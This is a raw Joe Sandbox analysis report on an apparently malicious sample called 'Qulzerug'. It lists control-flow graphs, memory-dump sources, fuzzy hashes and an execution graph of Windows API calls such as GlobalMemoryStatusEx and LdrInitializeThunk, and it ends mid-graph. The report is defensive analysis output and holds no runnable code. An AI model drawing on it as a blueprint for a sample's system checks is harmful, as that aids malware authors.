                        control_flow_graph 105 809f460-809f488 107 809f48a-809f4d1 105->107 108 809f4d6-809f4e4 105->108 151 809f92d-809f934 107->151 109 809f4f3 108->109 110 809f4e6-809f4f1 108->110 111 809f4f5-809f4fc 109->111 110->111 114 809f502-809f506 111->114 115 809f5e5-809f5e9 111->115 118 809f50c-809f510 114->118 119 809f935-809f95d 114->119 116 809f5eb-809f5fa 115->116 117 809f63f-809f649 115->117 129 809f5fe-809f603 116->129 123 809f64b-809f65a 117->123 124 809f682-809f6a8 117->124 121 809f522-809f580 118->121 122 809f512-809f51c 118->122 127 809f964-809f98e 119->127 160 809f9f3-809fa1d 121->160 161 809f586-809f5e0 121->161 122->121 122->127 133 809f660-809f67d 123->133 134 809f996-809f9ac 123->134 147 809f6aa-809f6b3 124->147 148 809f6b5 124->148 127->134 135 809f5fc 129->135 136 809f605-809f63a call 809f330 129->136 133->151 162 809f9b4-809f9ec 134->162 135->129 136->151 153 809f6b7-809f6df 147->153 148->153 165 809f7b0-809f7b4 153->165 166 809f6e5-809f6fe 153->166 170 809fa1f-809fa25 160->170 171 809fa27-809fa2d 160->171 161->151 162->160 172 809f82e-809f838 165->172 173 809f7b6-809f7cf 165->173 166->165 190 809f704-809f713 166->190 170->171 178 809fa2e-809fa6b 170->178 175 809f83a-809f844 172->175 176 809f895-809f89e 172->176 173->172 194 809f7d1-809f7e0 173->194 191 809f84a-809f85c 175->191 192 809f846-809f848 175->192 181 809f8a0-809f8ce 176->181 182 809f8d6-809f923 176->182 181->182 199 809f92b 182->199 207 809f72b-809f740 190->207 208 809f715-809f71b 190->208 196 809f85e-809f860 191->196 192->196 212 809f7f8-809f803 194->212 213 809f7e2-809f7e8 194->213 203 809f88e-809f893 196->203 204 809f862-809f866 196->204 199->151 203->175 203->176 209 809f868-809f881 204->209 210 809f884-809f887 204->210 218 809f742-809f76e 207->218 219 809f774-809f77d 207->219 214 809f71d 208->214 215 809f71f-809f721 208->215 209->210 210->203 212->160 225 809f809-809f82c 212->225 223 809f7ea 213->223 224 809f7ec-809f7ee 213->224 214->207 215->207 218->162 218->219 219->160 222 809f783-809f7aa 219->222 222->165 222->190 223->212 224->212 225->172 225->194
                        Memory Dump Source
                        • Source File: 0000000B.00000002.1585423563.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_8080000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 75578e6285c6735ae76f3ea6296148af5255c35155e0fecf731537c41994f40a
                        • Instruction ID: 70746a32fabde12bdabef171d412d760c425bd81e072c04c2f094680f35ec48c
                        • Opcode Fuzzy Hash: 75578e6285c6735ae76f3ea6296148af5255c35155e0fecf731537c41994f40a
                        • Instruction Fuzzy Hash: 48127C71A00605DFCB24DFA9C484AAEB7F6FF88301B24852DD446DB791DB35AC46CB91

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 313 aad030-aad042 314 aad048 313->314 315 aad0d3-aad0da 313->315 316 aad04a-aad056 314->316 315->316 318 aad0df-aad0e4 316->318 319 aad05c-aad07e 316->319 318->319 320 aad0e9-aad0fe 319->320 321 aad080-aad09b 319->321 326 aad0b5-aad0bd 320->326 323 aad0a3-aad0b3 321->323 325 aad10b 323->325 323->326 327 aad0bf-aad0d0 326->327 328 aad100-aad109 326->328 328->327
                        Memory Dump Source
                        • Source File: 0000000B.00000002.1518124378.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_aad000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 65d52342c594136b752596881d8fffcf9d33bad6187cb464c97eaa333e78b1d6
                        • Instruction ID: b42bb0847a3fe6396c304db49a95d3e518c1916f6870abeda44ea11546535149
                        • Opcode Fuzzy Hash: 65d52342c594136b752596881d8fffcf9d33bad6187cb464c97eaa333e78b1d6
                        • Instruction Fuzzy Hash: DA2125B1504244DFDB15DF14D9C4B26BB65FB85314F24C569D88B0BA86C336D806CBA2

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 391 809f330-809f352 392 809f3f9-809f405 391->392 393 809f358-809f374 391->393 395 809f3d1-809f3f6 393->395 396 809f376-809f38a call 809f460 393->396 395->392 400 809f390-809f3ad 396->400 400->395 402 809f3af-809f3c9 400->402 402->395
                        Memory Dump Source
                        • Source File: 0000000B.00000002.1585423563.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_8080000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cb6677f310a3a9e5e3cb3a2915fe13fa4664b48cba37ec25e348e8addf6ff0ec
                        • Instruction ID: 3ed4e7c75142d0f2e5f44c9897af52920e1c8a8175707060e84fc2447aaf5704
                        • Opcode Fuzzy Hash: cb6677f310a3a9e5e3cb3a2915fe13fa4664b48cba37ec25e348e8addf6ff0ec
                        • Instruction Fuzzy Hash: 3821F571A00209CFDB04DF98C585ADDB7F2AF8C301F2045A9E449BB2A1DB75AD45CBA0

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 463 aad02b-aad042 464 aad048 463->464 465 aad0d3-aad0da 463->465 466 aad04a-aad056 464->466 465->466 468 aad0df-aad0e4 466->468 469 aad05c-aad07e 466->469 468->469 470 aad0e9-aad0fe 469->470 471 aad080-aad09b 469->471 476 aad0b5-aad0bd 470->476 473 aad0a3-aad0b3 471->473 475 aad10b 473->475 473->476 477 aad0bf-aad0d0 476->477 478 aad100-aad109 476->478 478->477
                        Memory Dump Source
                        • Source File: 0000000B.00000002.1518124378.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_aad000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 633f671973706fbafc265e8a78a39be7cd23416c3fb565de0cfc706c6b37537b
                        • Instruction ID: c091732614e3f3d1652a72082b9c32a8fbe873e764e9ca55c7008391e3885c8b
                        • Opcode Fuzzy Hash: 633f671973706fbafc265e8a78a39be7cd23416c3fb565de0cfc706c6b37537b
                        • Instruction Fuzzy Hash: B211D376504280CFCB12CF10D9C4B16BF71FB85314F24C2AAD84A0BA56C33AD81ACBA2

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 480 809def8-809df19 481 809df1b 480->481 482 809df20-809df76 480->482 481->482 487 809df7d-809df85 482->487
                        Memory Dump Source
                        • Source File: 0000000B.00000002.1585423563.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_8080000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c6e3334da6ccafe646d2f30638e2e0aacaa3313fc9668becf39e9745af6fd620
                        • Instruction ID: 581e1f7e86d1fab6aa07411b1c391f94599f9c0e4c17ddfa97129df4ec6aed3c
                        • Opcode Fuzzy Hash: c6e3334da6ccafe646d2f30638e2e0aacaa3313fc9668becf39e9745af6fd620
                        • Instruction Fuzzy Hash: A911F7B4E00209DFDB44DFA9C9467AEBBF5FF88300F20806AD419A7355DA709A418F91

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 488 89d76d-89d78d 489 89d7dd-89d7e5 488->489 490 89d78f-89d79a 488->490 489->490 491 89d79c-89d7aa 490->491 492 89d7d2-89d7d9 490->492 495 89d7b0 491->495 492->491 496 89d7db 492->496 497 89d7b3-89d7bb 495->497 496->497 498 89d7cb-89d7d0 497->498 499 89d7bd-89d7c5 497->499 498->499 499->498
                        Memory Dump Source
                        • Source File: 0000000B.00000002.1510823826.000000000089D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0089D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_89d000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 041c7e8f23b8e7c266fd23f5ff393499067f7884d181f51b2cbf959d6fa1019d
                        • Instruction ID: 19a1a5106190f0aec46f1b813a73b2e020bbf6d53cf4995345bbc4cfe5e9b458
                        • Opcode Fuzzy Hash: 041c7e8f23b8e7c266fd23f5ff393499067f7884d181f51b2cbf959d6fa1019d
                        • Instruction Fuzzy Hash: 2901A771504344AFEB205A55DDC4766BBD8FF41328F1CC41AED498A682C6799840CA76
                        Memory Dump Source
                        • Source File: 0000000B.00000002.1510823826.000000000089D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0089D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_89d000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8bfb014b7e306670c48e8ee78e842160da9264c09458721a8f7e7ccabd5ecae4
                        • Instruction ID: f87524502e0f286064d491c241a65892b124c6f5d9a7966d6ca011f6c3c0df71
                        • Opcode Fuzzy Hash: 8bfb014b7e306670c48e8ee78e842160da9264c09458721a8f7e7ccabd5ecae4
                        • Instruction Fuzzy Hash: EEF0CD72408344AEEB208A16DCC4B62FF98FB41728F28C45AED484F686C2789C40CAB1
                        Memory Dump Source
                        • Source File: 0000000B.00000002.1585423563.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_8080000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f3d79fda6901a9b262d6f7bda0c976839a8c6da3f3c9ab5c65588c32c73862af
                        • Instruction ID: 15eb31fb184dbf416661a0a837c0098236d787afc7d6ea4f07007e8d942c39ae
                        • Opcode Fuzzy Hash: f3d79fda6901a9b262d6f7bda0c976839a8c6da3f3c9ab5c65588c32c73862af
                        • Instruction Fuzzy Hash: C001E870A01518DFCB64EF18CC48A9AB7B1EB48305F0050E6E50AA7759DB34AF858F11
                        Memory Dump Source
                        • Source File: 0000000B.00000002.1585423563.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_8080000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a1aaa71547a0b27a4bb41ae36804b9ff09b25d13bd2272c183bb703a4ff22e3b
                        • Instruction ID: 86cf83819cc2e536b781dd346bd2eaf2fa1b19d11639c6688f21f7535f58f1e4
                        • Opcode Fuzzy Hash: a1aaa71547a0b27a4bb41ae36804b9ff09b25d13bd2272c183bb703a4ff22e3b
                        • Instruction Fuzzy Hash: EE01E574A011288FCBA1DF28D984A99B7F5FB48700F0040E9E40DAB354DB346F84CF10
                        Memory Dump Source
                        • Source File: 0000000B.00000002.1585423563.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_8080000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 354c74d093081f6bbccc49b5e27e854db1e76e488c6e5f2286f234dd0597b2e8
                        • Instruction ID: 55404430ea4440351fc427a05defdbecc1f9b5459cbcc0e739f16c2da0370ae5
                        • Opcode Fuzzy Hash: 354c74d093081f6bbccc49b5e27e854db1e76e488c6e5f2286f234dd0597b2e8
                        • Instruction Fuzzy Hash: D0F01574D08248EFCB80DFA8D840AADBBF9AB4D211F14C0EAE899D3341D6359A11EF50
                        Memory Dump Source
                        • Source File: 0000000B.00000002.1585423563.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_8080000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1dfb6877e34fd19c4a416bbe4b7a01a24fed285d818b91a71e2aea0cc721549b
                        • Instruction ID: a559bbe402f880730f38dadfaa2463a4873472fcd549d6638b252ea6fb5855e4
                        • Opcode Fuzzy Hash: 1dfb6877e34fd19c4a416bbe4b7a01a24fed285d818b91a71e2aea0cc721549b
                        • Instruction Fuzzy Hash: 03E0C975D04208EFCB84DFA8D941A9DBBF5EB49311F10C0AE984993351D7359A51EF41
                        Memory Dump Source
                        • Source File: 0000000B.00000002.1585423563.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_8080000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 107ded89372075c6c7e9afec5a5082d13738e0542ea6059e1c4f1533ca76c834
                        • Instruction ID: 83b03f403a25c4a30ae7d609b3df5359fb960d814791cf020d402d0cdcea1eb1
                        • Opcode Fuzzy Hash: 107ded89372075c6c7e9afec5a5082d13738e0542ea6059e1c4f1533ca76c834
                        • Instruction Fuzzy Hash: D1F0B7746081198FDB54EF28C844A9AB3F1EB48304F1440E9E51A97399D734AF858F51
                        Memory Dump Source
                        • Source File: 0000000B.00000002.1585423563.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_8080000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1dfb6877e34fd19c4a416bbe4b7a01a24fed285d818b91a71e2aea0cc721549b
                        • Instruction ID: 416058cbf7bf38310f92400ad50bb72dab5e2c00c9ef9ec61aec8078a75dfc88
                        • Opcode Fuzzy Hash: 1dfb6877e34fd19c4a416bbe4b7a01a24fed285d818b91a71e2aea0cc721549b
                        • Instruction Fuzzy Hash: 5AE0ED74D04208EFCB84DFA8D94069DFBF5EB59300F10C1AAD85993351D7359A51EF41
                        Memory Dump Source
                        • Source File: 0000000B.00000002.1585423563.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_8080000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1dfb6877e34fd19c4a416bbe4b7a01a24fed285d818b91a71e2aea0cc721549b
                        • Instruction ID: 7ff79c287cc908c641a5fa256cf6bb14c02075056a585904b1e71e06b443f7f6
                        • Opcode Fuzzy Hash: 1dfb6877e34fd19c4a416bbe4b7a01a24fed285d818b91a71e2aea0cc721549b
                        • Instruction Fuzzy Hash: D0E0C974D04208EFCB84DFA9D9406ADBBF5EB49300F10C0AA985993351D6359A51EF41
                        Memory Dump Source
                        • Source File: 0000000B.00000002.1585423563.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_8080000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1dfb6877e34fd19c4a416bbe4b7a01a24fed285d818b91a71e2aea0cc721549b
                        • Instruction ID: 4133caf7cbc9b9c42037276dfae453f3d0714a4c7d6480639da8a5653a5c2fcd
                        • Opcode Fuzzy Hash: 1dfb6877e34fd19c4a416bbe4b7a01a24fed285d818b91a71e2aea0cc721549b
                        • Instruction Fuzzy Hash: 51E0C974D04208EFCB84DFA8D94069DBBF9EB89311F10C0AA9949A3351D7759A51EF41
                        Memory Dump Source
                        • Source File: 0000000B.00000002.1585423563.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_8080000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8fba2d71dfb88184723f47cd03ab1da80ca81902dc5dcd4cffc725455450baa6
                        • Instruction ID: 777794c7da506db0f9eefef419a5f251e8a72239fef6d5e805eaa1766bc9e696
                        • Opcode Fuzzy Hash: 8fba2d71dfb88184723f47cd03ab1da80ca81902dc5dcd4cffc725455450baa6
                        • Instruction Fuzzy Hash: E8E08674908208EBCB44DFA8D940A6DBFB9AB4A301F1080ADE84957341C7719E42EBA1
                        Memory Dump Source
                        • Source File: 0000000B.00000002.1585423563.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_8080000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 80d94875ce722b7bb4060f393972f9a5707795da63698799c42c5081392f4338
                        • Instruction ID: d74e505255e70b52aa3d4f886a54ae48f48bf3e6176e68a80d4dea74b9726724
                        • Opcode Fuzzy Hash: 80d94875ce722b7bb4060f393972f9a5707795da63698799c42c5081392f4338
                        • Instruction Fuzzy Hash: 3CE01A34D09208EBCB54DF98D5416ACBBF9AB89201F1080EAC85953381DB355A02EB41
                        Memory Dump Source
                        • Source File: 0000000B.00000002.1585423563.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_8080000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b83a4849a87b94ab663d7814215b840622c47e1f26d36de4574781c7a48e1656
                        • Instruction ID: 6c8647c095cf44b54f3fd3daf3317f9d024d3121cd3e05d69f38ed2832bcd368
                        • Opcode Fuzzy Hash: b83a4849a87b94ab663d7814215b840622c47e1f26d36de4574781c7a48e1656
                        • Instruction Fuzzy Hash: E6E01234D09208DBDB54DF98E9416ADBFBDEB86305F1091EEC84917351DB315E42EB81
                        Memory Dump Source
                        • Source File: 0000000B.00000002.1585423563.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_8080000_Qulzerug.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 49d6b5a404b30a011b253f1b548aa60e07a298b0d9c419ff902244d015bf30a6
                        • Instruction ID: e1279b21dffdd9024707affd996a21cf0f95daf3ad1c305160f6b3c7b6b30961
                        • Opcode Fuzzy Hash: 49d6b5a404b30a011b253f1b548aa60e07a298b0d9c419ff902244d015bf30a6
                        • Instruction Fuzzy Hash: 90C08C3208A2048BD9905F88B80833933ED8787202F442814A90E0016396680040E146

                        Execution Graph

                        Execution Coverage:13.9%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:87
                        Total number of Limit Nodes:9
                        execution_graph 33177 6defd48 33179 6defd6b 33177->33179 33178 6defe41 33179->33178 33182 6d50040 LdrInitializeThunk 33179->33182 33184 6d5003b 33179->33184 33183 6d50080 33182->33183 33183->33178 33185 6d50040 LdrInitializeThunk 33184->33185 33186 6d50080 33185->33186 33186->33178 33077 1613108 33078 1613126 33077->33078 33090 161a689 33078->33090 33094 161a5d8 33078->33094 33079 1613557 33098 161a730 33079->33098 33080 161364c 33103 161a971 33080->33103 33081 1613760 33108 161a9f9 33081->33108 33082 16138ce 33113 161aa80 33082->33113 33083 16139e2 33091 161a5cd GetSystemMetrics 33090->33091 33093 161a667 33091->33093 33093->33079 33095 161a62e GetSystemMetrics 33094->33095 33097 161a667 33095->33097 33097->33079 33099 161a74d 33098->33099 33118 161a7a8 33099->33118 33124 161a7b8 33099->33124 33100 161a778 33100->33080 33105 161a98d 33103->33105 33104 161a9b7 33104->33081 33140 161a9c0 33105->33140 33145 161a9d0 33105->33145 33110 161aa15 33108->33110 33109 161aa3f 33109->33082 33148 161aa48 33110->33148 33151 161aa58 33110->33151 33115 161aa9d 33113->33115 33114 161aac7 33114->33083 33154 161aad1 33115->33154 33157 161aae0 33115->33157 33119 161a798 33118->33119 33120 161a7b6 33118->33120 33119->33100 33128 161a7e0 33120->33128 33134 161a7f0 33120->33134 33121 161a7c6 33121->33100 33126 161a7e0 GlobalMemoryStatusEx 33124->33126 33127 161a7f0 GlobalMemoryStatusEx 33124->33127 33125 161a7c6 33125->33100 33126->33125 33127->33125 33129 161a79f 33128->33129 33131 161a7ea 33128->33131 33129->33121 33130 161a7fd 33130->33121 33131->33130 33132 161a90e GlobalMemoryStatusEx 33131->33132 33133 161a93e 33132->33133 33133->33121 33135 161a825 33134->33135 33136 161a7fd 33134->33136 33137 161a846 33135->33137 33138 161a90e GlobalMemoryStatusEx 33135->33138 33136->33121 33137->33121 33139 161a93e 33138->33139 33139->33121 33141 161a95d 33140->33141 33142 161a9cf 33140->33142 33141->33104 33143 161a7f0 GlobalMemoryStatusEx 33142->33143 33144 161a9dd 33143->33144 33144->33104 33146 161a9dd 33145->33146 33147 161a7f0 GlobalMemoryStatusEx 33145->33147 33146->33104 33147->33146 33149 161a7f0 GlobalMemoryStatusEx 33148->33149 33150 161aa65 33149->33150 33150->33109 33152 161aa65 33151->33152 33153 161a7f0 GlobalMemoryStatusEx 33151->33153 33152->33109 33153->33152 33155 161aaed 33154->33155 33156 161a7f0 GlobalMemoryStatusEx 33154->33156 33155->33114 33156->33155 33158 161a7f0 GlobalMemoryStatusEx 33157->33158 33159 161aaed 33158->33159 33159->33114 33160 6d5d258 33161 6d5d280 LdrInitializeThunk 33160->33161 33163 6d5d2ee 33161->33163 33164 6dedcb0 LdrInitializeThunk 33166 6dedd0b 33164->33166 33165 6deddb0 33166->33165 33169 161dd57 33166->33169 33173 161dd60 33166->33173 33171 161dd60 33169->33171 33170 161f67e 33170->33165 33171->33170 33172 161e635 LdrInitializeThunk 33171->33172 33172->33171 33175 161dd8a 33173->33175 33174 161f67e 33174->33165 33175->33174 33176 161e635 LdrInitializeThunk 33175->33176 33176->33175
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000C.00000002.2499168031.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_1610000_Qulzerug.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID: Y
                        • API String ID: 2994545307-3233089245
                        • Opcode ID: 3d0b149aa046d611a0164905e650bcb7092cfd9c474121229fe77578804917c3
                        • Instruction ID: 7250919af5b59d1f26f5494aae54ce14bb9144a17f74646ac06455a80f58ed6a
                        • Opcode Fuzzy Hash: 3d0b149aa046d611a0164905e650bcb7092cfd9c474121229fe77578804917c3
                        • Instruction Fuzzy Hash: 8E132A71D106198ECB25EF68C884AADF7B1FF89300F55C6D9D458AB225EB70AAC5CF40
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000C.00000002.2499168031.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_1610000_Qulzerug.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID: Y
                        • API String ID: 2994545307-3233089245
                        • Opcode ID: 3d65fe5e9c58538fd719b742fafbffa16456c63c2a2fb0b3bb6e74d4bc44c4ec
                        • Instruction ID: ffd1fbc09de99b32d691d6e946ff3ffe11cd5002c88a8b3cc64e9062363f32fb
                        • Opcode Fuzzy Hash: 3d65fe5e9c58538fd719b742fafbffa16456c63c2a2fb0b3bb6e74d4bc44c4ec
                        • Instruction Fuzzy Hash: 80821A70D006198FCB64EF69C884A9DFBF1FF89304F54C69AD458AB215EB70AA85CF41

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1375 6d5d258-6d5d2e7 LdrInitializeThunk 1383 6d5d2ee-6d5d3f9 1375->1383 1401 6d5e056-6d5e098 call 6d50950 1383->1401 1402 6d5d3ff-6d5d42b 1383->1402 1420 6d5e09d-6d5e0a4 1401->1420 1405 6d5d431-6d5d48a 1402->1405 1406 6d5d4cb-6d5d639 1402->1406 1405->1401 1423 6d5d490-6d5d4c5 1405->1423 1444 6d5e033-6d5e04f call 6d50950 1406->1444 1445 6d5d63f-6d5d648 1406->1445 1423->1406 1444->1420 1445->1401 1446 6d5d64e-6d5d696 1445->1446 1453 6d5e051 1446->1453 1454 6d5d69c-6d5d7b8 1446->1454 1453->1401 1454->1453 1472 6d5d7be-6d5d8a6 1454->1472 1472->1401 1488 6d5d8ac-6d5d8b4 1472->1488 1488->1401 1489 6d5d8ba-6d5d8c2 1488->1489 1489->1401 1490 6d5d8c8-6d5d8eb 1489->1490 1492 6d5d901-6d5d905 1490->1492 1493 6d5d8ed-6d5d8f1 1490->1493 1495 6d5d907-6d5d90b 1492->1495 1496 6d5d91f-6d5d985 1492->1496 1493->1401 1494 6d5d8f7-6d5d8ff 1493->1494 1494->1492 1495->1401 1497 6d5d911-6d5d919 1495->1497 1506 6d5d987-6d5d98c 1496->1506 1507 6d5d98e 1496->1507 1497->1496 1508 6d5d995-6d5d9d8 1506->1508 1507->1508 1512 6d5dff1-6d5e01f 1508->1512 1513 6d5d9de-6d5da3b 1508->1513 1512->1453 1518 6d5e021-6d5e02d 1512->1518 1523 6d5dfd1-6d5dfd7 1513->1523 1524 6d5da41-6d5da9f 1513->1524 1518->1444 1518->1445 1525 6d5dfdd-6d5dfe3 1523->1525 1524->1523 1533 6d5daa5-6d5db03 1524->1533 1525->1453 1526 6d5dfe5-6d5dfeb 1525->1526 1526->1512 1526->1513 1533->1523 1540 6d5db09-6d5dbcf 1533->1540 1556 6d5dc04-6d5dc0a 1540->1556 1557 6d5dbd1-6d5dbfe 1540->1557 1556->1453 1558 6d5dc10-6d5dc17 1556->1558 1557->1556 1569 6d5dd79-6d5dd7d 1557->1569 1559 6d5dca4-6d5dd01 1558->1559 1560 6d5dc1d-6d5dc23 1558->1560 1576 6d5dd67-6d5dd74 1559->1576 1577 6d5dd03-6d5dd61 1559->1577 1560->1453 1562 6d5dc29-6d5dc2c 1560->1562 1562->1559 1569->1525 1571 6d5dd83-6d5ddb0 1569->1571 1581 6d5dde5-6d5ddeb 1571->1581 1582 6d5ddb2-6d5dddf 1571->1582 1576->1525 1577->1576 1600 6d5dc2e-6d5dc9b 1577->1600 1581->1453 1584 6d5ddf1-6d5ddf8 1581->1584 1582->1525 1582->1581 1586 6d5de09-6d5de2d 1584->1586 1587 6d5ddfa-6d5de00 1584->1587 1599 6d5dea5-6d5df02 1586->1599 1587->1453 1589 6d5de06 1587->1589 1589->1586 1613 6d5df04-6d5df62 1599->1613 1614 6d5df68-6d5dfcf 1599->1614 1600->1453 1621 6d5dca1 1600->1621 1613->1614 1630 6d5de2f-6d5de9c 1613->1630 1614->1512 1621->1559 1630->1453 1640 6d5dea2 1630->1640 1640->1599
                        APIs
                        Memory Dump Source
                        • Source File: 0000000C.00000002.2524638093.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_6d50000_Qulzerug.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: a4dadbf74bff4022e9840528534741d9ff00127bd61b1e563d82a6aa9585d6ad
                        • Instruction ID: a13343c0e736fce6d522e2345180b0d9dba2e16d57e03242647449b469f3cae6
                        • Opcode Fuzzy Hash: a4dadbf74bff4022e9840528534741d9ff00127bd61b1e563d82a6aa9585d6ad
                        • Instruction Fuzzy Hash: 6D820870B002148FDBA4EF79C854BAEB7F2BF88704F2584A9D419EB394DE71AD418B51

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2054 6d5d24b-6d5d255 2055 6d5d257-6d5d29b 2054->2055 2056 6d5d29e-6d5d2be 2054->2056 2055->2056 2062 6d5d2c9-6d5d2e7 LdrInitializeThunk 2056->2062 2063 6d5d2ee-6d5d3f9 2062->2063 2081 6d5e056-6d5e098 call 6d50950 2063->2081 2082 6d5d3ff-6d5d42b 2063->2082 2100 6d5e09d-6d5e0a4 2081->2100 2085 6d5d431-6d5d48a 2082->2085 2086 6d5d4cb-6d5d639 2082->2086 2085->2081 2103 6d5d490-6d5d4c5 2085->2103 2124 6d5e033-6d5e04f call 6d50950 2086->2124 2125 6d5d63f-6d5d648 2086->2125 2103->2086 2124->2100 2125->2081 2126 6d5d64e-6d5d696 2125->2126 2133 6d5e051 2126->2133 2134 6d5d69c-6d5d7b8 2126->2134 2133->2081 2134->2133 2152 6d5d7be-6d5d8a6 2134->2152 2152->2081 2168 6d5d8ac-6d5d8b4 2152->2168 2168->2081 2169 6d5d8ba-6d5d8c2 2168->2169 2169->2081 2170 6d5d8c8-6d5d8eb 2169->2170 2172 6d5d901-6d5d905 2170->2172 2173 6d5d8ed-6d5d8f1 2170->2173 2175 6d5d907-6d5d90b 2172->2175 2176 6d5d91f-6d5d985 2172->2176 2173->2081 2174 6d5d8f7-6d5d8ff 2173->2174 2174->2172 2175->2081 2177 6d5d911-6d5d919 2175->2177 2186 6d5d987-6d5d98c 2176->2186 2187 6d5d98e 2176->2187 2177->2176 2188 6d5d995-6d5d9d8 2186->2188 2187->2188 2192 6d5dff1-6d5e01f 2188->2192 2193 6d5d9de-6d5da3b 